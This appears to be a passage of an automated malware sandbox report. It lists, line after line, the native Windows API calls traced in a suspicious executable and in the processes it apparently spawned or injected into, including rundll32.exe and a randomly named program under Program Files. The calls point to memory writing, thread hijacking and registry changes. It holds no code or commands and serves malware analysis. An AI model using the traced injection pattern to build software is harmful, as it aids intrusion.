Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902AA0 NtQueryInformationFile,		10_2_1E902AA0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902AC0 NtEnumerateValueKey,		10_2_1E902AC0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902A10 NtWriteFile,		10_2_1E902A10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B80 NtCreateKey,		10_2_1E902B80
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902BE0 NtQueryVirtualMemory,		10_2_1E902BE0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B00 NtQueryValueKey,		10_2_1E902B00
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E902B20 NtQueryInformationProcess,		10_2_1E902B20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9038D0 NtGetContextThread,		10_2_1E9038D0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E9029D0 NtWaitForSingleObject,		10_2_1E9029D0
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E904570 NtSuspendThread,		10_2_1E904570
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe	Code function: 10_2_1E904260 NtSetContextThread,		10_2_1E904260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A34E0 NtCreateMutant,LdrInitializeThunk,		15_2_043A34E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2C30 NtMapViewOfSection,LdrInitializeThunk,		15_2_043A2C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2CF0 NtDelayExecution,LdrInitializeThunk,		15_2_043A2CF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2D10 NtQuerySystemInformation,LdrInitializeThunk,		15_2_043A2D10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,		15_2_043A2DC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2E50 NtCreateSection,LdrInitializeThunk,		15_2_043A2E50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2F00 NtCreateFile,LdrInitializeThunk,		15_2_043A2F00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2FB0 NtSetValueKey,LdrInitializeThunk,		15_2_043A2FB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A29F0 NtReadFile,LdrInitializeThunk,		15_2_043A29F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2A80 NtClose,LdrInitializeThunk,		15_2_043A2A80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2AC0 NtEnumerateValueKey,LdrInitializeThunk,		15_2_043A2AC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B10 NtAllocateVirtualMemory,LdrInitializeThunk,		15_2_043A2B10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B00 NtQueryValueKey,LdrInitializeThunk,		15_2_043A2B00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B90 NtFreeVirtualMemory,LdrInitializeThunk,		15_2_043A2B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B80 NtCreateKey,LdrInitializeThunk,		15_2_043A2B80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2BC0 NtQueryInformationToken,LdrInitializeThunk,		15_2_043A2BC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A4570 NtSuspendThread,		15_2_043A4570
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A4260 NtSetContextThread,		15_2_043A4260
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A3C30 NtOpenProcessToken,		15_2_043A3C30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2C20 NtSetInformationFile,		15_2_043A2C20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2C10 NtOpenProcess,		15_2_043A2C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2C50 NtUnmapViewOfSection,		15_2_043A2C50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A3C90 NtOpenThread,		15_2_043A3C90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2CD0 NtEnumerateKey,		15_2_043A2CD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2D50 NtWriteVirtualMemory,		15_2_043A2D50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2DA0 NtReadVirtualMemory,		15_2_043A2DA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2E00 NtQueueApcThread,		15_2_043A2E00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2EB0 NtProtectVirtualMemory,		15_2_043A2EB0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2E80 NtCreateProcessEx,		15_2_043A2E80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2ED0 NtResumeThread,		15_2_043A2ED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2EC0 NtQuerySection,		15_2_043A2EC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2F30 NtOpenDirectoryObject,		15_2_043A2F30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A38D0 NtGetContextThread,		15_2_043A38D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A29D0 NtWaitForSingleObject,		15_2_043A29D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2A10 NtWriteFile,		15_2_043A2A10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2AA0 NtQueryInformationFile,		15_2_043A2AA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2B20 NtQueryInformationProcess,		15_2_043A2B20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_043A2BE0 NtQueryVirtualMemory,		15_2_043A2BE0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_004185E0 NtCreateFile,		15_2_004185E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00418690 NtReadFile,		15_2_00418690
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_00418710 NtClose,		15_2_00418710
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_004187C0 NtAllocateVirtualMemory,		15_2_004187C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0041868D NtReadFile,		15_2_0041868D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_0041870A NtClose,		15_2_0041870A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_004187C2 NtAllocateVirtualMemory,		15_2_004187C2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A2AD2 NtSetContextThread,		22_2_022A2AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A23E2 NtProtectVirtualMemory,		22_2_022A23E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_0229C88B NtAllocateVirtualMemory,LoadLibraryA,		22_2_0229C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A06A2 NtWriteVirtualMemory,LoadLibraryA,		22_2_022A06A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A322B NtWriteVirtualMemory,		22_2_022A322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_0229CE0C NtWriteVirtualMemory,LoadLibraryA,		22_2_0229CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 22_2_022A0754 NtWriteVirtualMemory,LoadLibraryA,		22_2_022A0754
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 25_2_000001BF40004D02 NtCreateFile,		25_2_000001BF40004D02
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A2AD2 NtSetInformationThread,		26_2_022A2AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A23E2 NtProtectVirtualMemory,		26_2_022A23E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_0229C88B NtAllocateVirtualMemory,LoadLibraryA,		26_2_0229C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A06A2 NtWriteVirtualMemory,LoadLibraryA,		26_2_022A06A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A322B NtWriteVirtualMemory,		26_2_022A322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_0229CE0C NtWriteVirtualMemory,LoadLibraryA,		26_2_0229CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 26_2_022A0754 NtWriteVirtualMemory,LoadLibraryA,		26_2_022A0754
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_02332AD2 NtResumeThread,		27_2_02332AD2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_023323E2 NtProtectVirtualMemory,		27_2_023323E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_0232C88B NtAllocateVirtualMemory,LoadLibraryA,		27_2_0232C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_023306A2 NtWriteVirtualMemory,LoadLibraryA,		27_2_023306A2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_0233322B NtWriteVirtualMemory,		27_2_0233322B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_0232CE0C NtWriteVirtualMemory,LoadLibraryA,		27_2_0232CE0C
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 27_2_02330754 NtWriteVirtualMemory,LoadLibraryA,		27_2_02330754
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,		28_2_1EA32DC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32D10 NtQuerySystemInformation,LdrInitializeThunk,		28_2_1EA32D10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B90 NtFreeVirtualMemory,LdrInitializeThunk,		28_2_1EA32B90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B10 NtAllocateVirtualMemory,LdrInitializeThunk,		28_2_1EA32B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA334E0 NtCreateMutant,LdrInitializeThunk,		28_2_1EA334E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32EB0 NtProtectVirtualMemory,		28_2_1EA32EB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32E80 NtCreateProcessEx,		28_2_1EA32E80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32EC0 NtQuerySection,		28_2_1EA32EC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32ED0 NtResumeThread,		28_2_1EA32ED0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32E00 NtQueueApcThread,		28_2_1EA32E00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32E50 NtCreateSection,		28_2_1EA32E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32FB0 NtSetValueKey,		28_2_1EA32FB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32F30 NtOpenDirectoryObject,		28_2_1EA32F30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32F00 NtCreateFile,		28_2_1EA32F00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA33C90 NtOpenThread,		28_2_1EA33C90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32CF0 NtDelayExecution,		28_2_1EA32CF0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32CD0 NtEnumerateKey,		28_2_1EA32CD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32C20 NtSetInformationFile,		28_2_1EA32C20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32C30 NtMapViewOfSection,		28_2_1EA32C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA33C30 NtOpenProcessToken,		28_2_1EA33C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32C10 NtOpenProcess,		28_2_1EA32C10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32C50 NtUnmapViewOfSection,		28_2_1EA32C50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32DA0 NtReadVirtualMemory,		28_2_1EA32DA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32D50 NtWriteVirtualMemory,		28_2_1EA32D50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32AA0 NtQueryInformationFile,		28_2_1EA32AA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32A80 NtClose,		28_2_1EA32A80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32AC0 NtEnumerateValueKey,		28_2_1EA32AC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32A10 NtWriteFile,		28_2_1EA32A10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B80 NtCreateKey,		28_2_1EA32B80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32BE0 NtQueryVirtualMemory,		28_2_1EA32BE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32BC0 NtQueryInformationToken,		28_2_1EA32BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B20 NtQueryInformationProcess,		28_2_1EA32B20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA32B00 NtQueryValueKey,		28_2_1EA32B00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA338D0 NtGetContextThread,		28_2_1EA338D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA329F0 NtReadFile,		28_2_1EA329F0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA329D0 NtWaitForSingleObject,		28_2_1EA329D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA34570 NtSuspendThread,		28_2_1EA34570
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_1EA34260 NtSetContextThread,		28_2_1EA34260
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_005723E2 NtProtectVirtualMemory,		28_2_005723E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA,		28_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00563CE1 NtProtectVirtualMemory,		28_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 28_2_00563E0E NtProtectVirtualMemory,		28_2_00563E0E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,		29_2_1E8F2DC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2D10 NtQuerySystemInformation,LdrInitializeThunk,		29_2_1E8F2D10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B90 NtFreeVirtualMemory,LdrInitializeThunk,		29_2_1E8F2B90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B10 NtAllocateVirtualMemory,LdrInitializeThunk,		29_2_1E8F2B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F34E0 NtCreateMutant,LdrInitializeThunk,		29_2_1E8F34E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2E80 NtCreateProcessEx,		29_2_1E8F2E80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2EB0 NtProtectVirtualMemory,		29_2_1E8F2EB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2EC0 NtQuerySection,		29_2_1E8F2EC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2ED0 NtResumeThread,		29_2_1E8F2ED0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2E00 NtQueueApcThread,		29_2_1E8F2E00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2E50 NtCreateSection,		29_2_1E8F2E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2FB0 NtSetValueKey,		29_2_1E8F2FB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2F00 NtCreateFile,		29_2_1E8F2F00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2F30 NtOpenDirectoryObject,		29_2_1E8F2F30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F3C90 NtOpenThread,		29_2_1E8F3C90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2CD0 NtEnumerateKey,		29_2_1E8F2CD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2CF0 NtDelayExecution,		29_2_1E8F2CF0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2C10 NtOpenProcess,		29_2_1E8F2C10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2C20 NtSetInformationFile,		29_2_1E8F2C20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F3C30 NtOpenProcessToken,		29_2_1E8F3C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2C30 NtMapViewOfSection,		29_2_1E8F2C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2C50 NtUnmapViewOfSection,		29_2_1E8F2C50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2DA0 NtReadVirtualMemory,		29_2_1E8F2DA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2D50 NtWriteVirtualMemory,		29_2_1E8F2D50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2A80 NtClose,		29_2_1E8F2A80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2AA0 NtQueryInformationFile,		29_2_1E8F2AA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2AC0 NtEnumerateValueKey,		29_2_1E8F2AC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2A10 NtWriteFile,		29_2_1E8F2A10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B80 NtCreateKey,		29_2_1E8F2B80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2BC0 NtQueryInformationToken,		29_2_1E8F2BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2BE0 NtQueryVirtualMemory,		29_2_1E8F2BE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B00 NtQueryValueKey,		29_2_1E8F2B00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F2B20 NtQueryInformationProcess,		29_2_1E8F2B20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F38D0 NtGetContextThread,		29_2_1E8F38D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F29D0 NtWaitForSingleObject,		29_2_1E8F29D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F29F0 NtReadFile,		29_2_1E8F29F0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F4570 NtSuspendThread,		29_2_1E8F4570
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_1E8F4260 NtSetContextThread,		29_2_1E8F4260
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_005723E2 NtProtectVirtualMemory,		29_2_005723E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA,		29_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00563CE1 NtProtectVirtualMemory,		29_2_00563CE1
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 29_2_00563E0E NtProtectVirtualMemory,		29_2_00563E0E
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,		30_2_1E902DC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902D10 NtQuerySystemInformation,LdrInitializeThunk,		30_2_1E902D10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B90 NtFreeVirtualMemory,LdrInitializeThunk,		30_2_1E902B90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B10 NtAllocateVirtualMemory,LdrInitializeThunk,		30_2_1E902B10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E9034E0 NtCreateMutant,LdrInitializeThunk,		30_2_1E9034E0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902E80 NtCreateProcessEx,		30_2_1E902E80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902EB0 NtProtectVirtualMemory,		30_2_1E902EB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902ED0 NtResumeThread,		30_2_1E902ED0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902EC0 NtQuerySection,		30_2_1E902EC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902E00 NtQueueApcThread,		30_2_1E902E00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902E50 NtCreateSection,		30_2_1E902E50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902FB0 NtSetValueKey,		30_2_1E902FB0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902F00 NtCreateFile,		30_2_1E902F00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902F30 NtOpenDirectoryObject,		30_2_1E902F30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E903C90 NtOpenThread,		30_2_1E903C90
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902CD0 NtEnumerateKey,		30_2_1E902CD0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902CF0 NtDelayExecution,		30_2_1E902CF0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902C10 NtOpenProcess,		30_2_1E902C10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E903C30 NtOpenProcessToken,		30_2_1E903C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902C30 NtMapViewOfSection,		30_2_1E902C30
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902C20 NtSetInformationFile,		30_2_1E902C20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902C50 NtUnmapViewOfSection,		30_2_1E902C50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902DA0 NtReadVirtualMemory,		30_2_1E902DA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902D50 NtWriteVirtualMemory,		30_2_1E902D50
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902A80 NtClose,		30_2_1E902A80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902AA0 NtQueryInformationFile,		30_2_1E902AA0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902AC0 NtEnumerateValueKey,		30_2_1E902AC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902A10 NtWriteFile,		30_2_1E902A10
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B80 NtCreateKey,		30_2_1E902B80
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902BC0 NtQueryInformationToken,		30_2_1E902BC0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902BE0 NtQueryVirtualMemory,		30_2_1E902BE0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B00 NtQueryValueKey,		30_2_1E902B00
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E902B20 NtQueryInformationProcess,		30_2_1E902B20
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E9038D0 NtGetContextThread,		30_2_1E9038D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E9029D0 NtWaitForSingleObject,		30_2_1E9029D0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E9029F0 NtReadFile,		30_2_1E9029F0
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E904570 NtSuspendThread,		30_2_1E904570
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_1E904260 NtSetContextThread,		30_2_1E904260
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_005723E2 NtProtectVirtualMemory,		30_2_005723E2
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA,		30_2_0056C88B
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe	Code function: 30_2_00563CE1 NtProtectVirtualMemory,		30_2_00563CE1
